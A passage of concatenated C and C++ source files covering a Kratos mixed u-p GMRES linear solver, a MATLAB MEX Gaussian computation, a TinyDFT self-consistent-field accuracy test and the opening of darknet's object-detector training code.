{
y (i) /= h (i,i);
for (int j = i - 1; j >= 0; --j)
y (j) -= h (j,i) * y (i);
}
//create new search dir
for (int j = 0; j <= k; ++j)
TSparseSpaceType::UnaliasedAdd (x, y[j], V[j]); // x += y(j)* V[j];
}
int gmres_solve ( SparseMatrixType& A,
VectorType& x,
const VectorType& b,
unsigned int& m,
unsigned int& max_iter,
double& tol)
{
const unsigned int dim = A.size1();
if (m == 0)
KRATOS_THROW_ERROR (std::logic_error,"the dimension of the GMRES krylov space can not be set to zero. Please change the value of m","")
if (m > max_iter)
m = max_iter;
VectorType s (m+1), sn (m+1), w (dim), r (dim), y (m+1);
VectorType cs (m+1);
Matrix H (m+1, m+1);
int restart = 0;
//preconditioner solve b and store in Minv_b
VectorType preconditioned_b (dim);
//TSparseSpaceType::Copy(b, preconditioned_b); //preconditioned_b=b
//apply preconditioner
SolveBlockPreconditioner (b,preconditioned_b);
double normb = TSparseSpaceType::TwoNorm (preconditioned_b);
/*KRATOS_WATCH(normb);*/
if (normb < 1e-16) //ARBITRARY SMALL NUMBER!
{
normb = 1e-16;
}
//r = b - Ax
TSparseSpaceType::Mult (A,x,r);
TSparseSpaceType::ScaleAndAdd (1.00, b, -1.00, r); //r = b - r
//apply preconditioner and overwrite r
SolveBlockPreconditioner (r,r);
const double rel_tol = tol*normb;
double beta = TSparseSpaceType::TwoNorm (r);
if (beta <= rel_tol) //finalize!
{
tol = beta / normb;
max_iter = 0;
return 0;
}
unsigned int j;
// int err = 0;
std::vector< VectorType > V (m+1);
for (j = 0; j <= m; ++j)
V[j].resize (dim,false);
j = 1;
while (j <= max_iter)
{
TSparseSpaceType::Assign (V[0], 1.0/beta, r); //V[0] = r /(T)beta;
TSparseSpaceType::SetToZero (s);
s[0] = beta;
for (unsigned int i = 0; (i < m) && (j <= max_iter); ++i, ++j)
{
TSparseSpaceType::Mult (A,V[i],w); //w = A*V[i];
//apply preconditioner and overwrite r
SolveBlockPreconditioner (w,w);
for (unsigned int k = 0; k <= i; k++)
{
H (k, i) = TSparseSpaceType::Dot (V[k], w);
w -= H (k, i) * V[k];
}
const double normw = TSparseSpaceType::TwoNorm (w);
H (i+1, i) = normw;
/*KRATOS_WATCH(normw);*/
// This breakdown is a good one ...
if (normw == 0)
TSparseSpaceType::Copy (V[i+1], w); //V[i+1] = w;
else
TSparseSpaceType::Assign (V[i+1], 1.0/normw, w); //V[i+1] = w / normw;
for (unsigned int k = 0; k < i; k++)
ApplyPlaneRotation (H (k,i), H (k+1,i), cs (k), sn (k) );
GeneratePlaneRotation (H (i,i), H (i+1,i), cs (i), sn (i) );
ApplyPlaneRotation (H (i,i), H (i+1,i), cs (i), sn (i) );
ApplyPlaneRotation (s (i), s (i+1), cs (i), sn (i) );
beta = fabs (s (i+1) );
std::cout << "iter = " << j << " estimated res ratio = " << beta << std::endl;
// KRATOS_WATCH (beta);
if (beta <= rel_tol)
{
this->Update (y, x, i, H, s, V);
return 0;
}
}
this->Update (y,x, m - 1, H, s, V);
//r = b - Ax
TSparseSpaceType::Mult (A,x,r);
TSparseSpaceType::ScaleAndAdd (1.00, b, -1.00, r); //r = b - r
beta = TSparseSpaceType::TwoNorm (r);
std::cout << "number of iterations at convergence = " << j << std::endl;
if (beta < rel_tol)
{
return 0;
}
++restart;
}
// err = 1;
return 1;
}
//this function extracts from a vector which has the size of the
//overall r, the part that corresponds to u-dofs
void GetUPart (const VectorType& rtot, VectorType& ru)
{
if (ru.size() != mother_indices.size() )
ru.resize (mother_indices.size(), false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(ru.size()); i++)
ru[i] = rtot[mother_indices[i]];
}
//this function extracts from a vector which has the size of the
//overall r, the part that corresponds to p-dofs
void GetPPart (const VectorType& rtot, VectorType& rp)
{
if (rp.size() != mpressure_indices.size() )
rp.resize (mpressure_indices.size(), false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(rp.size()); i++)
rp[i] = rtot[mpressure_indices[i]];
}
void WriteUPart (VectorType& rtot, const VectorType& ru)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ru.size()); i++)
rtot[mother_indices[i]] = ru[i];
}
void WritePPart (VectorType& rtot, const VectorType& rp)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(rp.size()); i++)
rtot[mpressure_indices[i]] = rp[i];
}
void ComputeDiagonalByLumping (SparseMatrixType& A,VectorType& diagA)
{
if (diagA.size() != A.size1() )
diagA.resize (A.size1() );
//get access to A data
const std::size_t* index1 = A.index1_data().begin();
// const std::size_t* index2 = A.index2_data().begin();
const double* values = A.value_data().begin();
#pragma omp parallel for
for (int i=0; i< static_cast<int>(A.size1()); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
double temp = 0.0;
for (unsigned int j=row_begin; j<row_end; j++)
temp += values[j]*values[j];
diagA[i] = sqrt(temp);
}
}
double CheckMatrix (SparseMatrixType& A)
{
//get access to A data
const std::size_t* index1 = A.index1_data().begin();
const std::size_t* index2 = A.index2_data().begin();
const double* values = A.value_data().begin();
double norm = 0.0;
for (unsigned int i=0; i<A.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
if (row_end - row_begin == 0)
std::cout << "line " << i << " has no elements" << std::endl;
//KRATOS_THROW_ERROR(std::logic_error, "line found with no entries on line ",i)
for (unsigned int j=row_begin; j<row_end; j++)
{
if (index2[j]>A.size2() )
KRATOS_THROW_ERROR (std::logic_error, "array above size of A","")
norm += values[j]*values[j];
}
}
return sqrt (norm);
}
void SolveBlockPreconditioner (const VectorType& rtot, VectorType& x)
{
boost::numeric::ublas::noalias(mp) = boost::numeric::ublas::zero_vector<double>(mother_indices.size());
boost::numeric::ublas::noalias(mu) = boost::numeric::ublas::zero_vector<double>(mother_indices.size());
VectorType uaux (mother_indices.size() );
VectorType paux (mpressure_indices.size() );
//get diagonal of K (to be removed)
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (mK,diagK);
//get the u and p residuals
GetUPart (rtot,mru);
GetPPart (rtot,mrp);
//solve u block
mpsolver_UU_block->Solve (mK,mu,mru);
//correct pressure block
//rp -= D*u
TSparseSpaceType::Mult (mD,mu,paux);
TSparseSpaceType::UnaliasedAdd (mrp,-1.0,paux);
//solve pressure
//p = S⁻1*rp
mpsolver_PP_block->Solve (mS,mp,mrp);
//correct u block
//u = G*p
TSparseSpaceType::Mult (mG,mp,uaux);
#pragma omp parallel for
for (int i=0; i< static_cast<int>(mu.size()); i++)
mu[i] += uaux[i]/diagK[i];
//write back solution
WriteUPart (x,mu);
WritePPart (x,mp);
}
/// Compute the Pressure System Matrix
/**
* Compute the System Matrix A = L - D*Inv(Diag(S))*G. The multiplication
* is performed in random order, so each row will be stored in a temporary
* variable, ordered and copied in input matrix A.
*/
void CalculateShurComplement (
SparseMatrixType& A,
SparseMatrixType& K,
SparseMatrixType& rG,
SparseMatrixType& rD,
SparseMatrixType& rL,
VectorType& diagK
)
{
// Retrieve matrices
// Compute Inv(Diag(S))
VectorType& rIDiagS = diagK;
//KRATOS_WATCH(804)
typedef DenseVector<int> IndexVector;
//typedef typename SparseMatrixType::iterator1 OuterIt;
//typedef typename SparseMatrixType::iterator2 InnerIt;
typedef typename boost::numeric::ublas::matrix_row< SparseMatrixType > RowType;
int DiagSize = int (diagK.size()); // to avoid comparison between int & unsigned int
#pragma omp parallel for
for ( int i = 0; i < DiagSize; i++)
rIDiagS[i] = 1.0/diagK[i];
OpenMPUtils::PartitionVector Partition;
int NumThreads = OpenMPUtils::GetNumThreads();
OpenMPUtils::DivideInPartitions (A.size1(),NumThreads,Partition);
#pragma omp parallel
{
int k = OpenMPUtils::ThisThread();
VectorType CurrentRow(K.size2());
for (unsigned int i = 0; i < rL.size1(); i++) CurrentRow[i] = 0.0;
IndexVector Next = IndexVector(rL.size1());
//IndexVector& Next = *pNext; // Keeps track of which columns were filled
for (unsigned int m=0; m < rL.size1(); m++) Next[m] = -1;
std::size_t NumTerms = 0; // Full positions in a row
std::vector<unsigned int> UsedCols = std::vector<unsigned int>();
// std::vector<unsigned int>& UsedCols = *pUsedCols;
UsedCols.reserve (rL.size1());
for ( int RowIndex = Partition[k] ;
RowIndex != Partition[k+1] ; RowIndex++ )
{
RowType RowD (rD,RowIndex);
RowType RowL (rL,RowIndex);
int head = -2;
std::size_t Length = 0;
// Write L in A
for ( typename RowType::iterator ItL = RowL.begin();
ItL != RowL.end(); ItL++ )
{
CurrentRow (ItL.index() ) = *ItL;
if ( Next[ItL.index()] == -1)
{
Next[ItL.index()] = head;
head = ItL.index();
Length++;
}
}
// Substract D*Inv(Diag(S))*G
for ( typename RowType::iterator ItD = RowD.begin();
ItD != RowD.end(); ItD++ )
{
RowType RowG (rG,ItD.index() );
for ( typename RowType::iterator ItG = RowG.begin();
ItG != RowG.end(); ItG++ )
{
CurrentRow[ItG.index()] -= (*ItD) * rIDiagS[ItD.index()] * (*ItG);
if ( Next[ItG.index()] == -1)
{
Next[ItG.index()] = head;
head = ItG.index();
Length++;
}
}
}
// Identify full terms for ordering
for ( std::size_t i = 0; i < Length; i++)
{
if ( Next[head] != -1 )
{
UsedCols.push_back (head);
NumTerms++;
}
int temp = head;
head = Next[head];
// Clear 'Next' for next iteration
Next[temp] = -1;
}
// Sort Column indices
SortCols (UsedCols,NumTerms);
// Fill matrix row, then clean temporary variables.
RowType RowA (A,RowIndex);
std::size_t n = 0;
unsigned int Col;
for ( typename RowType::iterator ItA = RowA.begin(); ItA != RowA.end(); ItA++)
{
Col = UsedCols[n++];
*ItA = CurrentRow[Col];
CurrentRow[Col] = 0;
}
NumTerms = 0;
UsedCols.resize (0,false);
}
}
//KRATOS_WATCH(896)
//add stabilization matrix L
/* const std::size_t* L_index1 = rL.index1_data().begin();
const std::size_t* L_index2 = rL.index2_data().begin();
const double* L_values = rL.value_data().begin();
for (unsigned int i=0; i<rL.size1(); i++)
{
unsigned int row_begin = L_index1[i];
unsigned int row_end = L_index1[i+1];
diagA[i] = 0.0;
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col = L_index2[j];
rS(i,col) += L_values[j];
}
}*/
}
/// Helper function for Sytem matrix functions
void SortCols (
std::vector<unsigned int>& ColList,
std::size_t& NumCols)
{
bool swap = true;
unsigned int d = NumCols;
int temp;
while ( swap || d > 1 )
{
swap = false;
d = (d+1) /2;
for ( unsigned int i=0; i< (NumCols - d); i++)
if ( ColList[i+d] < ColList[i] )
{
temp = ColList[i+d];
ColList[i+d] = ColList[i];
ColList[i] = temp;
swap = true;
}
}
}
/// Identify non-zero tems in the system matrix
void ConstructSystemMatrix(
SparseMatrixType& A,
SparseMatrixType& rG,
SparseMatrixType& rD,
SparseMatrixType& rL
)
{
typedef DenseVector<int> IndexVector;
typedef OpenMPUtils::PartitionVector PartitionVector;
//typedef typename SparseMatrixType::iterator1 OuterIt;
//typedef typename SparseMatrixType::iterator2 InnerIt;
typedef typename boost::numeric::ublas::matrix_row< SparseMatrixType > RowType;
PartitionVector Partition;
int NumThreads = OpenMPUtils::GetNumThreads();
OpenMPUtils::DivideInPartitions(A.size1(),NumThreads,Partition);
for ( int k = 0 ; k < NumThreads ; k++)
{
// This code is serial, the pragma is here to ensure that each
// row block is assigned to the processor that will fill it
#pragma omp parallel
if ( OpenMPUtils::ThisThread() == k)
{
// Kratos::shared_ptr< IndexVector > pNext( new IndexVector(rL.size1() ) );
// IndexVector& Next = *pNext; // Keeps track of which columns were filled
IndexVector Next(rL.size1());
for (unsigned int m = 0; m < rL.size1(); m++) Next[m] = -1;
std::size_t NumTerms = 0; // Full positions in a row
std::vector<unsigned int> UsedCols;
// std::vector<unsigned int>& UsedCols = *pUsedCols;
UsedCols.reserve(rL.size1());
for ( int RowIndex = Partition[k] ;
RowIndex != Partition[k+1] ; RowIndex++ )
{
RowType RowD(rD,RowIndex);
RowType RowL(rL,RowIndex);
int head = -2;
std::size_t Length = 0;
// Terms filled by L
for ( typename RowType::iterator ItL = RowL.begin();
ItL != RowL.end(); ItL++ )
{
if ( Next[ItL.index()] == -1)
{
Next[ItL.index()] = head;
head = ItL.index();
Length++;
}
}
// Additional terms due to D*Inv(Diag(S))*G
for ( typename RowType::iterator ItD = RowD.begin();
ItD != RowD.end(); ItD++ )
{
RowType RowG(rG,ItD.index());
for ( typename RowType::iterator ItG = RowG.begin();
ItG != RowG.end(); ItG++ )
{
if ( Next[ItG.index()] == -1)
{
Next[ItG.index()] = head;
head = ItG.index();
Length++;
}
}
}
// Identify full terms for ordering
for ( std::size_t i = 0; i < Length; i++)
{
if ( Next[head] != -1 )
{
UsedCols.push_back(head);
NumTerms++;
}
int temp = head;
head = Next[head];
// Clear 'Next' for next iteration
Next[temp] = -1;
}
// Sort Column indices
SortCols(UsedCols,NumTerms);
// Store row in matrix, clean temporary variables
for ( unsigned int i = 0; i < NumTerms; i++)
{
A.push_back(RowIndex,UsedCols[i],0);
}
NumTerms = 0;
UsedCols.resize(0,false);
}
}
}
}
///@}
///@name Private Operations
///@{
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
///@}
}; // Class MixedUPLinearSolver
///@}
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::istream& operator >> (std::istream& IStream,
MixedUPLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
return IStream;
}
/// output stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::ostream& operator << (std::ostream& rOStream,
const MixedUPLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
rThis.PrintInfo (rOStream);
rOStream << std::endl;
rThis.PrintData (rOStream);
return rOStream;
}
///@}
} // namespace Kratos.
#endif // KRATOS_MIXEDUP_SOLVER_H_INCLUDED defined
|
calcCondQB.c | #include <mex.h>
#include <math.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
int min(int A, int B) {
if (A < B) {
return A;
} else {
return B;
}
}
int max(int A, int B) {
if (A > B) {
return A;
} else {
return B;
}
}
void mexFunction(int nlhs, mxArray *plhs[], int nrhs, const mxArray *prhs[]) {
/* Input variables */
double *mu = mxGetPr(prhs[0]);
double *var = mxGetPr(prhs[1]);
int numRows = (int) mxGetScalar(prhs[2]);
int numBounds = (int) mxGetScalar(prhs[3]);
int numColumnsShape = (int) mxGetScalar(prhs[4]);
int numColumnsPred = (int) mxGetScalar(prhs[5]);
int *colA = (int*) mxGetData(prhs[6]);
double *colAFac = mxGetPr(prhs[7]);
int *colB = (int*) mxGetData(prhs[8]);
double *colBFac = mxGetPr(prhs[9]);
double eps = mxGetScalar(prhs[10]);
/* intern variables and pointers */
float* condQB = NULL;
int* cmin = NULL;
int* cmax = NULL;
float factor,varinv,varAvg,muAvg;
int i,j,k,idx,idx2,numNotZero,muFloor,startVal,stopVal,idxA,idxB;
/* 2-D matrix with [numBounds,numColumnsPred] */
plhs[0] = mxCreateNumericMatrix(numRows,numBounds*numColumnsPred,mxSINGLE_CLASS,mxREAL);
condQB = (float *) mxGetPr(plhs[0]);
plhs[1] = mxCreateNumericMatrix(1,numBounds*numColumnsPred,mxINT32_CLASS,mxREAL);
cmin = (int *)mxGetData(plhs[1]);
plhs[2] = mxCreateNumericMatrix(1,numBounds*numColumnsPred,mxINT32_CLASS,mxREAL);
cmax = (int *)mxGetData(plhs[2]);
/* negative entropy of q_c */
#pragma omp parallel for private(j,i,idx,idx2,startVal,stopVal,varinv,numNotZero,muFloor,factor,varAvg,muAvg,idxA,idxB)
for (k=0; k < numBounds; k++) {
for (j=0; j < numColumnsPred; j++) {
/*idx = k*numColumnsShape + j;
factor = 1/sqrt(2*3.1415926535897*var[idx]);
muFloor = (int) mu[idx];*/
idx = k*numColumnsPred + j;
idxA = colA[j]+k*numColumnsShape; idxB = colB[j]+k*numColumnsShape;
varAvg = (float) (colAFac[j]*var[idxA] + colBFac[j]*var[idxB]);
muAvg = (float) (colAFac[j]*mu[idxA] + colBFac[j]*mu[idxB]);
factor = 1/sqrtf(2*3.1415926535897*varAvg);
muFloor = (int) muAvg;
/* calculate rows for which the gaussian is larger than threshold */
numNotZero = (int) ceil(abs(sqrt(-log(eps*factor)*2*varAvg)));
startVal = max(muFloor-numNotZero,1);
stopVal = min(muFloor+numNotZero,numRows);
cmin[idx] = startVal-1;
cmax[idx] = stopVal-1;
idx2 = idx*numRows;
varinv = -1/(2*varAvg);
for (i=startVal; i <= stopVal; i++) {
condQB[idx2 + i - 1] = factor*expf(varinv*(i-muAvg)*(i-muAvg));
}
}
}
}
|
test_SCF_lastD.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <math.h>
#include <omp.h>
#include "TinyDFT.h"
#include "TinyDFT_typedef.h"
#include "H2ERI.h"
#include "utils.h" // In H2Pack
void TinyDFT_copy_shells_to_H2ERI(TinyDFT_p TinyDFT, H2ERI_p h2eri)
{
h2eri->natom = TinyDFT->natom;
h2eri->nshell = TinyDFT->nshell;
h2eri->shells = (shell_t *) malloc(sizeof(shell_t) * h2eri->nshell);
assert(h2eri->shells != NULL);
simint_initialize_shells(h2eri->nshell, h2eri->shells);
shell_t *src_shells = (shell_t*) TinyDFT->simint->shells;
shell_t *dst_shells = h2eri->shells;
for (int i = 0; i < h2eri->nshell; i++)
{
simint_allocate_shell(src_shells[i].nprim, &dst_shells[i]);
simint_copy_shell(&src_shells[i], &dst_shells[i]);
}
}
// Functions from AnySCF
void TinyDFT_SCF(TinyDFT_p TinyDFT, const int max_iter, const int J_op, const int K_op)
{
// Start SCF iterations
printf("Self-Consistent Field iteration started...\n");
printf("Nuclear repulsion energy = %.10lf\n", TinyDFT->E_nuc_rep);
TinyDFT->iter = 0;
TinyDFT->max_iter = max_iter;
double E_prev, E_curr, E_delta = 19241112.0;
int mat_size = TinyDFT->mat_size;
int xf_id = TinyDFT->xf_id;
int xf_family = TinyDFT->xf_family;
double *Hcore_mat = TinyDFT->Hcore_mat;
double *S_mat = TinyDFT->S_mat;
double *X_mat = TinyDFT->X_mat;
double *J_mat = TinyDFT->J_mat;
double *K_mat = TinyDFT->K_mat;
double *XC_mat = TinyDFT->XC_mat;
double *F_mat = TinyDFT->F_mat;
double *Cocc_mat = TinyDFT->Cocc_mat;
double *D_mat = TinyDFT->D_mat;
double *E_nuc_rep = &TinyDFT->E_nuc_rep;
double *E_one_elec = &TinyDFT->E_one_elec;
double *E_two_elec = &TinyDFT->E_two_elec;
double *E_HF_exchange = &TinyDFT->E_HF_exchange;
double *E_DFT_XC = &TinyDFT->E_DFT_XC;
int J_direct = 0, K_direct = 0, JK_direct = 0;
int J_denfit = 0, K_denfit = 0, K_xc = 0, xc_hybrid = 0;
if (xf_family == FAMILY_HYB_GGA) xc_hybrid = 1;
if (J_op == 0) J_direct = 1;
if (J_op == 1) J_denfit = 1;
if (K_op == 0) K_direct = 1;
if (K_op == 1) K_denfit = 1;
if (K_op == 2) K_xc = 1;
if (xc_hybrid == 1)
{
if (J_direct == 1) K_direct = 1;
if (J_denfit == 1) K_denfit = 1;
}
JK_direct = J_direct & K_direct;
double HF_x_coef;
if (xf_id == HYB_GGA_XC_B3LYP || xf_id == HYB_GGA_XC_B3LYP5) HF_x_coef = 0.2;
while ((TinyDFT->iter < TinyDFT->max_iter) && (fabs(E_delta) >= TinyDFT->E_tol))
{
printf("--------------- Iteration %d ---------------\n", TinyDFT->iter);
double st0, et0, st1, et1, st2;
double J_time = 0, K_time = 0, XC_time = 0;
st0 = get_wtime_sec();
// Build the Fock matrix
J_time = 0.0;
K_time = 0.0;
XC_time = 0.0;
if (JK_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, K_mat);
st2 = get_wtime_sec();
J_time = 0.5 * (st2 - st1);
K_time = 0.5 * (st2 - st1);
}
if (JK_direct == 0 && J_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, NULL);
st2 = get_wtime_sec();
J_time = st2 - st1;
}
if (J_denfit == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, J_mat, NULL);
st2 = get_wtime_sec();
J_time = st2 - st1;
}
if (JK_direct == 0 && K_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, NULL, K_mat);
st2 = get_wtime_sec();
K_time = st2 - st1;
}
if (K_denfit == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, NULL, K_mat);
st2 = get_wtime_sec();
K_time = st2 - st1;
}
if (K_xc == 1)
{
st1 = get_wtime_sec();
*E_DFT_XC = TinyDFT_build_XC_mat(TinyDFT, D_mat, XC_mat);
st2 = get_wtime_sec();
XC_time = st2 - st1;
}
if (K_op == 0 || K_op == 1)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] - K_mat[i];
}
if (K_op == 2 && xc_hybrid == 0)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] + XC_mat[i];
}
if (K_op == 2 && xc_hybrid == 1)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] + XC_mat[i] - HF_x_coef * K_mat[i];
}
et1 = get_wtime_sec();
printf(
"* Build Fock matrix : %.3lf (s), J, K, XC = %.3lf, %.3lf, %.3lf (s)\n",
et1 - st0, J_time, K_time, XC_time
);
// Calculate new system energy
st1 = get_wtime_sec();
if (K_direct == 1 || K_denfit == 1)
{
TinyDFT_calc_HF_energy(
mat_size, D_mat, Hcore_mat, J_mat, K_mat,
E_one_elec, E_two_elec, E_HF_exchange
);
} else {
TinyDFT_calc_HF_energy(
mat_size, D_mat, Hcore_mat, J_mat, NULL,
E_one_elec, E_two_elec, NULL
);
}
E_curr = (*E_nuc_rep) + (*E_one_elec) + (*E_two_elec);
if (K_op == 0 || K_op == 1) E_curr += (*E_HF_exchange);
if (K_op == 2) E_curr += (*E_DFT_XC);
if (K_op == 2 && xc_hybrid == 1) E_curr += HF_x_coef * (*E_HF_exchange);
et1 = get_wtime_sec();
printf("* Calculate energy : %.3lf (s)\n", et1 - st1);
E_delta = E_curr - E_prev;
E_prev = E_curr;
// CDIIS acceleration (Pulay mixing)
st1 = get_wtime_sec();
TinyDFT_CDIIS(TinyDFT, X_mat, S_mat, D_mat, F_mat);
et1 = get_wtime_sec();
printf("* CDIIS procedure : %.3lf (s)\n", et1 - st1);
// Diagonalize and build the density matrix
st1 = get_wtime_sec();
TinyDFT_build_Dmat_eig(TinyDFT, F_mat, X_mat, D_mat, Cocc_mat);
et1 = get_wtime_sec();
printf("* Build density matrix : %.3lf (s)\n", et1 - st1);
et0 = get_wtime_sec();
printf("* Iteration runtime = %.3lf (s)\n", et0 - st0);
printf("* Energy = %.10lf", E_curr);
if (TinyDFT->iter > 0)
{
printf(", delta = %e\n", E_delta);
} else {
printf("\n");
E_delta = 19241112.0; // Prevent the SCF exit after 1st iteration when no SAD initial guess
}
TinyDFT->iter++;
}
printf("--------------- SCF iterations finished ---------------\n");
printf("Start checking accuracy of Coulomb matrix construction\n");
double *J_mat_test = (double *) malloc_aligned(DBL_MSIZE * TinyDFT->mat_size, 64);
double Jnorm, err_h2eri5, err_h2eri7, err_df;
// Direct method
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, NULL);
Jnorm = 0.0;
#pragma omp simd
for (int i = 0; i < mat_size; i++) Jnorm += J_mat[i] * J_mat[i];
Jnorm = sqrt(Jnorm);
printf("Direct method constructed J matrix fro-norm = %e\n", Jnorm);
// H2ERI 1e-5
H2ERI_p h2eri5;
H2ERI_init(&h2eri5, 1e-10, 1e-10, 1e-5);
TinyDFT_copy_shells_to_H2ERI(TinyDFT, h2eri5);
H2ERI_process_shells(h2eri5);
H2ERI_partition(h2eri5);
H2ERI_build_H2(h2eri5, 0);
H2ERI_build_Coulomb(h2eri5, D_mat, J_mat_test);
err_h2eri5 = 0;
#pragma omp simd
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_h2eri5 += diff * diff;
}
err_h2eri5 = sqrt(err_h2eri5) / Jnorm;
printf("H2ERI with 1e-5 AOT constructed J relative error = %e\n", err_h2eri5);
H2ERI_destroy(h2eri5);
// H2ERI 1e-7
H2ERI_p h2eri7;
H2ERI_init(&h2eri7, 1e-10, 1e-10, 1e-7);
TinyDFT_copy_shells_to_H2ERI(TinyDFT, h2eri7);
H2ERI_process_shells(h2eri7);
H2ERI_partition(h2eri7);
H2ERI_build_H2(h2eri7, 0);
H2ERI_build_Coulomb(h2eri7, D_mat, J_mat_test);
err_h2eri7 = 0;
#pragma omp simd
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_h2eri7 += diff * diff;
}
err_h2eri7 = sqrt(err_h2eri7) / Jnorm;
printf("H2ERI with 1e-7 AOT constructed J relative error = %e\n", err_h2eri7);
H2ERI_destroy(h2eri7);
if (J_op == 0) return;
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, J_mat_test, NULL);
err_df = 0;
#pragma omp simd
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_df += diff * diff;
}
err_df = sqrt(err_df) / Jnorm;
printf("DF constructed J relative error = %e\n", err_df);
}
void print_usage(const char *argv0)
{
printf("Usage: %s <basis> <xyz> <niter> <direct/DF J> <direct/DF/DFT K/XC> <df_basis> <X-func> <C-func>\n", argv0);
printf(" * direct/DF J: 0 for direct method, 1 for density fitting\n");
printf(" * direct/DF/DFT K/XC: 0 for direct method K, 1 for density fitting K, 2 for DFT XC\n");
printf(" * available XC functions: LDA_X, LDA_C_XA, LDA_C_PZ, LDA_C_PW,\n");
printf(" GGA_X_PBE, GGA_X_B88, GGA_C_PBE, GGA_C_LYP\n");
printf(" HYB_GGA_XC_B3LYP, HYB_GGA_XC_B3LYP5\n");
printf(" Note: if you use hybrid GGA functionals, enter it twice for both <X-func> and <C-func>.\n");
}
int main(int argc, char **argv)
{
if (argc < 6)
{
print_usage(argv[0]);
return 255;
}
double st, et;
int niter, J_op, K_op, use_DF = 0;
niter = atoi(argv[3]);
J_op = atoi(argv[4]);
K_op = atoi(argv[5]);
if (J_op < 0 || J_op > 1) J_op = 0;
if (K_op < 0 || K_op > 2) K_op = 0;
printf("[INFO] Use: ");
if (J_op == 0) printf("direct J, ");
if (J_op == 1) printf("denfit J, ");
if (K_op == 0) printf("direct K\n");
if (K_op == 1) printf("denfit K\n");
if (K_op == 2) printf("DFT XC\n");
// Initialize TinyDFT
TinyDFT_p TinyDFT;
TinyDFT_init(&TinyDFT, argv[1], argv[2]);
// Compute constant matrices and get initial guess for D
st = get_wtime_sec();
TinyDFT_build_Hcore_S_X_mat(TinyDFT, TinyDFT->Hcore_mat, TinyDFT->S_mat, TinyDFT->X_mat);
TinyDFT_build_Dmat_SAD(TinyDFT, TinyDFT->D_mat);
et = get_wtime_sec();
printf("TinyDFT compute Hcore, S, X matrices over, elapsed time = %.3lf (s)\n", et - st);
// Set up density fitting
if (J_op == 1 || K_op == 1)
{
if (argc < 7)
{
printf("You need to provide a density fitting auxiliary basis set!\n");
print_usage(argv[0]);
return 255;
}
use_DF = 1;
// If we don't need DF for K build, reduce memory usage in DF, only DF tensor build
// will become slower; otherwise, use more memory in DF for better K build performance
if (K_op == 1)
{
TinyDFT_setup_DF(TinyDFT, argv[6], argv[2], 0);
} else {
TinyDFT_setup_DF(TinyDFT, argv[6], argv[2], 1);
}
TinyDFT_build_Cocc_from_Dmat(TinyDFT, TinyDFT->D_mat, TinyDFT->Cocc_mat);
}
// Set up XC numerical integral environments
if (K_op == 2)
{
char default_xf_str[6] = "LDA_X\0";
char default_cf_str[10] = "LDA_C_PW\0";
char *xf_str = &default_xf_str[2];
char *cf_str = &default_cf_str[0];
if (use_DF == 1 && argc >= 9)
{
xf_str = argv[7];
cf_str = argv[8];
}
if (use_DF == 0 && argc >= 8)
{
xf_str = argv[6];
cf_str = argv[7];
}
st = get_wtime_sec();
TinyDFT_setup_XC_integral(TinyDFT, xf_str, cf_str);
et = get_wtime_sec();
printf("TinyDFT set up XC integral over, elapsed time = %.3lf (s)\n", et - st);
}
// Do SCF calculation
TinyDFT_SCF(TinyDFT, niter, J_op, K_op);
// Free TinyDFT and H2P-ERI
TinyDFT_destroy(&TinyDFT);
return 0;
}
|
detector.c | #include "darknet.h"
static int coco_ids[] = {1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,21,22,23,24,25,27,28,31,32,33,34,35,36,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,67,70,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,89,90};
void train_detector(char *datacfg, char *cfgfile, char *weightfile, int *gpus, int ngpus, int clear)
{
list *options = read_data_cfg(datacfg);
char *train_images = option_find_str(options, "train", "data/train.list");
char *backup_directory = option_find_str(options, "backup", "/backup/");
srand(time(0));
char *base = basecfg(cfgfile);
printf("%s\n", base);
float avg_loss = -1;
network **nets = calloc(ngpus, sizeof(network));
srand(time(0));
int seed = rand();
int i;
for(i = 0; i < ngpus; ++i){
srand(seed);
#ifdef GPU
cuda_set_device(gpus[i]);
#endif
